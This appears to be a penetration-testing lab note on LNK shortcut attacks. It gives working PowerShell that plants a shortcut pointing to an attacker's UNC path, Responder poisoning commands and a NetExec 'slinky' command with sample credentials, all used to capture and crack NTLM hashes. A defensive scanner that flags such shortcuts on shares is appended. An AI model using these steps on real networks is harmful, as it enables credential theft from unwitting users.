# LNK File Attacks

### Manual way

#### Step 1 - create a malicious LNK file

Create a shortcut whose target is a UNC path on the Kali host that will be running Responder.

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FMaN8UQGBlBnONSfQ404t%2Fimage.png?alt=media&#x26;token=96963418-d813-4648-85fe-3092938dc539" alt=""><figcaption></figcaption></figure>

```powershell
# Build the shortcut through the WScript.Shell COM object
$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\test.lnk")
# Target is a UNC path on the attacker host, so resolving it triggers an SMB authentication
$lnk.TargetPath = "\\192.168.145.141\@test.png"
$lnk.WindowStyle = 1
# Local icon so the shortcut looks like an ordinary file
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Test"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()
```

Put the shortcut in a shared folder.

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2F7Ux2TvGxXTbuopW5sPJQ%2Fimage.png?alt=media&#x26;token=a591682c-4d72-40bb-9d82-faea610d782d" alt=""><figcaption></figcaption></figure>

#### Step 2 - run Responder

```bash
sudo responder -I eth0 -v -dP
```

* `sudo`: Runs Responder with root privileges (required).
* `responder`: The main script to run the Responder tool.
* `-I eth0`: Specifies the network interface to listen on (e.g., `eth0`).
* `-v`: Enables verbose output.
* `-d`: Enables **NBT-NS (NetBIOS Name Service) poisoning**.
* `-P`: Enables **WPAD (Web Proxy Auto-Discovery Protocol) rogue proxy**.

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FbE2d2KOyuSLrtTYGHnxl%2Fimage.png?alt=media&#x26;token=8be743e5-83ff-4f70-b2ab-8b335a95be2f" alt=""><figcaption><p>Make sure SMB is on</p></figcaption></figure>

#### Step 3 - exploit

Open the shortcut and Responder captures the authenticating user's NTLM hash.

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2F2jYHB7KyPdoVpdEA6PhR%2Fimage.png?alt=media&#x26;token=635172d2-12df-4b55-8157-7eccb166ef00" alt=""><figcaption></figcaption></figure>

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FdSHnzkKxiHU3kxhW1fdv%2Fimage.png?alt=media&#x26;token=7c23606e-a684-48f0-8322-58a981773be9" alt=""><figcaption><p>We can crack it as well</p></figcaption></figure>

### Automated Way

NetExec can do this automatically with the `slinky` module.

```bash
netexec smb 192.168.138.137 -d marvel.local -u fcastle -p Password1 -M slinky -o NAME=test SERVER=192.168.138.149
```

It creates the LNK file on the share automatically.
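Both the manual shortcut and the `slinky` module leave the same artifact behind: a `.lnk` on a share that references a UNC path on a host the organisation does not own. The following triage script is an added example (not part of these notes or of NetExec/Responder) that walks a mounted share and flags such shortcuts; it carves ANSI and UTF-16LE strings from the file rather than fully parsing the MS-SHLLINK format, and the sample blob, host names and trusted-host list are constructed.

```python
import re
import ipaddress
from pathlib import Path

# HeaderSize 0x4C followed by the LinkCLSID 00021401-0000-0000-C000-000000000046
LNK_MAGIC = b"L\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00F"
UNC_RE = re.compile(r'\\\\([A-Za-z0-9._-]+)\\[^\s"<>|]*')


def carve_strings(data: bytes, min_len: int = 4):
    """Yield printable ASCII and UTF-16LE runs; LNK files store paths in both encodings."""
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        yield m.group().decode("ascii")
    for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data):
        yield m.group().decode("utf-16-le")


def suspicious_unc_paths(data: bytes, trusted_hosts=frozenset()):
    """Return UNC references whose host is a raw IP or not in trusted_hosts; [] for non-LNK input."""
    if not data.startswith(LNK_MAGIC):
        return []
    hits = set()
    for s in carve_strings(data):
        for m in UNC_RE.finditer(s):
            host = m.group(1)
            try:
                ipaddress.ip_address(host)
                raw_ip = True
            except ValueError:
                raw_ip = False
            if raw_ip or host.lower() not in trusted_hosts:
                hits.add(m.group(0))
    return sorted(hits)


def scan_share(root: str, trusted_hosts=frozenset()):
    """Walk a mounted share and map each .lnk path to its suspicious UNC references."""
    report = {}
    for p in Path(root).rglob("*.lnk"):
        found = suspicious_unc_paths(p.read_bytes(), trusted_hosts)
        if found:
            report[str(p)] = found
    return report


# Constructed sample: a header plus an ANSI UNC target (as in LinkInfo) and a
# UTF-16LE UNC string. It is not a valid shortcut, only the bytes the scanner inspects.
SAMPLE_LNK = (LNK_MAGIC + b"\x00" * 56
              + b"\\\\192.168.145.141\\@test.png\x00\x00"
              + "\\\\fileserver\\public\\readme.txt".encode("utf-16-le"))
```

Run `scan_share("/mnt/share", {"fileserver"})` against a mounted share; a hit on a raw IP, as in the sample, is worth an immediate look at who authenticated to that address.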

{% embed url="https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication#execution-via-.rtf" %}
